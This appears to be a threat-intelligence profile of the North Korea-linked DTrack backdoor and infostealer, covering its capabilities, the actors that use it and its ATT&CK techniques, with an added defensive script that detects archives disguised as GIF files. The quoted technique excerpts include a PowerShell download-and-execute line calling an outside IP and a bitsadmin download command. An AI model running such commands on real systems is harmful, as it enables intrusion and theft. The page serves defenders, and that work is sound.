DTrack
DTrack is a backdoor/remote access trojan and infostealer associated with the Lazarus Group; the reporting collected here links it specifically to Andariel/WASSONITE/Jumpy Pisces activity. It was first publicly disclosed in late September 2019 and was reported targeting Indian financial institutions, research centers, and a nuclear power facility in India. The malware has been described as loosely connected to ATMDTrack, an earlier Lazarus-linked malware family used in ATM theft operations.
The malware is used for remote access, reconnaissance, credential and host information collection, and as a dropper for additional payloads. Capabilities reported in the content include keylogging, retrieving browser history, collecting Windows registry values such as RegisteredOwner, RegisteredOrganization, and InstallDate, saving collected data to disk (in multiple file formats) and to network shares, and packing collected data into a password-protected archive for staging or exfiltration. One report cited in the content states that a DTrack variant deployed prior to Maui ransomware executed embedded shellcode and loaded a final in-memory Windows payload responsible for collecting victim information and sending it to a remote host.
Execution and evasion details mentioned in the content include a dropper carrying an encrypted payload embedded as extra data, process-hollowing shellcode that targets a predefined list of %SYSTEM32% processes, and code that resolves imports at runtime via LoadLibrary and GetProcAddress. Persistence is achieved by adding a Windows service named WBService. The malware has also been observed hiding inside replicas of legitimate programs such as OllyDbg, 7-Zip, and FileZilla.
The content ties DTrack to multiple North Korea-linked operations. WASSONITE operations relied on DTrack for remote access and credential capture. Andariel is described as deploying DTrack alongside Maui ransomware. In a 2024 Play ransomware incident investigated by Unit 42, Jumpy Pisces/Andariel reportedly spread DTrack over SMB after gaining access via a compromised account; DTrack execution was blocked by EDR in that case. The same reporting describes DTrack as an infostealer used in incidents attributed to North Korean threat groups and notes that it compresses collected data and disguises the resulting archive as a GIF file. The content also states that Andariel exploited Log4j in mid-2022 and downloaded DTrack shortly after exploitation.
High-confidence identifiers and aliases directly mentioned in the content include DTrack, VinoSiren, and Preft, as well as the persistence service name WBService.
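The summary above notes two concrete staging artifacts: collected data is packed into a password-protected archive, and that archive is written to disk disguised as a GIF file. A defender can catch this kind of extension/content mismatch with a simple triage scan. The script below is an added example written for this page, not code from the original page or from any vendor report; it builds a handful of constructed sample files in a temporary directory (the file names and contents are invented for the demonstration) and flags any .gif whose leading bytes are a ZIP, RAR, or 7-Zip signature rather than a GIF header. For ZIPs it additionally reads the general-purpose flag of the first local file header, whose low bit marks the entry as encrypted, which is the signal you would expect from a password-protected staging archive.

```python
import struct
import tempfile
from pathlib import Path

# Well-known file signatures (standard format constants, not taken from the page).
GIF_MAGICS = (b"GIF87a", b"GIF89a")
ARCHIVE_MAGICS = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"7z\xbc\xaf\x27\x1c": "7z",
}


def identify(header: bytes) -> str:
    """Return a coarse type label ("gif", "zip", "rar", "7z" or "unknown") from leading bytes."""
    if header.startswith(GIF_MAGICS):
        return "gif"
    for magic, label in ARCHIVE_MAGICS.items():
        if header.startswith(magic):
            return label
    return "unknown"


def zip_first_entry_encrypted(path: Path) -> bool:
    """True if the first ZIP local file header has the encryption flag (bit 0) set.

    Local file header layout: signature(4) version(2) flags(2) ... = 30 bytes,
    so the general-purpose flags live at offset 6.
    """
    with open(path, "rb") as fh:
        hdr = fh.read(30)
    if len(hdr) < 30 or not hdr.startswith(b"PK\x03\x04"):
        return False
    flags = struct.unpack_from("<H", hdr, 6)[0]
    return bool(flags & 0x0001)


def scan_directory(root: Path) -> list:
    """Flag every *.gif under root whose content is an archive rather than a GIF image."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() != ".gif":
            continue
        with open(path, "rb") as fh:
            header = fh.read(8)
        kind = identify(header)
        if kind == "gif":
            continue  # extension and content agree; nothing to report
        finding = {"path": path.name, "content_type": kind, "encrypted_zip": False}
        if kind == "zip":
            finding["encrypted_zip"] = zip_first_entry_encrypted(path)
        findings.append(finding)
    return findings


def build_samples(root: Path) -> None:
    """Write constructed sample files: one real GIF, two disguised archives, one honest ZIP."""
    (root / "photo.gif").write_bytes(b"GIF89a" + b"\x00" * 16)
    # ZIP local file header: version-needed 20, flags 0x0001 (entry is encrypted).
    enc_zip_hdr = b"PK\x03\x04" + struct.pack("<HH", 20, 0x0001) + b"\x00" * 22
    (root / "report.gif").write_bytes(enc_zip_hdr + b"\x00" * 16)
    (root / "banner.gif").write_bytes(b"Rar!\x1a\x07\x01\x00" + b"\x00" * 16)
    (root / "notes.zip").write_bytes(b"PK\x03\x04" + b"\x00" * 26)  # not a .gif, ignored


def run_demo() -> list:
    """Create the constructed samples in a temp dir, scan them and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_samples(root)
        return scan_directory(root)


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit['path']}: content is {hit['content_type']}, "
              f"encrypted zip entry: {hit['encrypted_zip']}")
```

On real telemetry the same check is cheap to run over user profile directories, temp folders, or any staging path surfaced by an EDR alert; a mismatch alone is not proof of DTrack, but a password-protected archive wearing an image extension is a strong staging indicator worth pivoting on.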
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
approximately ten hours prior to deploying Maui... the group deployed a variant of the well-known DTrack malware... Once this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload... responsible for collecting victim information and sending it to the remote host.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
WASSONITE operations rely on deploying DTrack malware for remote access to victim machines... Researchers first disclosed DTrack in late September 2019, and identified the tool targeting Indian financial institutions and research centers. DTrack is loosely connected to an earlier observed malware family, ATMDTrack, used for robbing ATM machines.
"DTrack (also known as VinoSiren and Preft). DTrack was used in 2019 to target a nuclear power facility in India..."
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
"The other victim operated a vulnerable Weblogic server... compromised this server via the CVE-2017-10271 exploit." | "In one victim system, we discovered that a well-known simple HTTP server, HFS7, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and “whoami” was executed..."
Execution
6 techniques
"powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')"
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Astaroth uses the LoadLibraryExW() function to load additional modules. Attor's dispatcher can execute additional plugins by loading the respective DLLs. ... LightSpy's main executable and module .dylib binaries are loaded using ... dlopen() ... dlsym() ... RotaJakiro uses ... .so files ... using dlopen() and dlsym().
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
...uses the LoadLibraryExW() function to load additional modules... execute additional plugins by loading the respective DLLs... loaded and executed DLLs in memory during runtime... loads a dynamic library (.dylib file) using dlopen() and obtains a function pointer... using dlopen() and dlsym()... calls LoadLibrary then executes exports from a DLL.
Persistence
5 techniques
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
Privilege Escalation
4 techniques
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
Stealth
7 techniques
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
"actors leverage legitimate credentials to log into external remote services"; "used legitimate credentials to gain initial access, maintain access, and exfiltrate data"; "used valid accounts for initial access and privilege escalation"
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
"...downloading and executing the above DTrack malware via bitsadmin.exe: bitsadmin.exe /transfer myJob /download ..."
...uses the LoadLibraryExW() function to load additional modules... execute additional plugins by loading the respective DLLs... loaded and executed DLLs in memory during runtime... loads a dynamic library (.dylib file) using dlopen() and obtains a function pointer... using dlopen() and dlsym()... calls LoadLibrary then executes exports from a DLL.
Discovery
7 techniques
The content repeatedly describes malware and threat actors querying, enumerating, searching, reading, or checking Windows Registry keys and values, e.g., "ADVSTORESHELL can enumerate registry keys," "APT41 queried registry values to determine items such as configured RDP ports and network configurations," and "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Lateral Movement
1 technique
Collection
3 techniques
The content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"AppleSeed has compressed collected data before exfiltration."; "APT28 used a publicly available tool to gather and compress multiple documents..."; "Aria-body has used ZIP to compress data..."; "Cadelspy...compress stolen data into a .cab file."; "Daserf hides collected data in password-protected .rar archives."; "FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration."; "Lazarus Group has compressed exfiltrated data with RAR...archive specified directories in .zip format"; "XCSSET will compress entire ~/Desktop folders..."
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
44 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Lazarus-linked backdoor/RAT supporting file transfer, keylogging, screenshot capture, and lateral movement; newer variants use process hollowing (e.g., explorer.exe).
Custom North Korea-linked malware used for lateral movement and persistence in compromised environments.
Custom Lazarus malware family used for persistence and remote access within victim environments.
Infostealer used for collection; collected data is compressed and disguised as a GIF file; deployed alongside Sliver for persistence/lateral movement over SMB.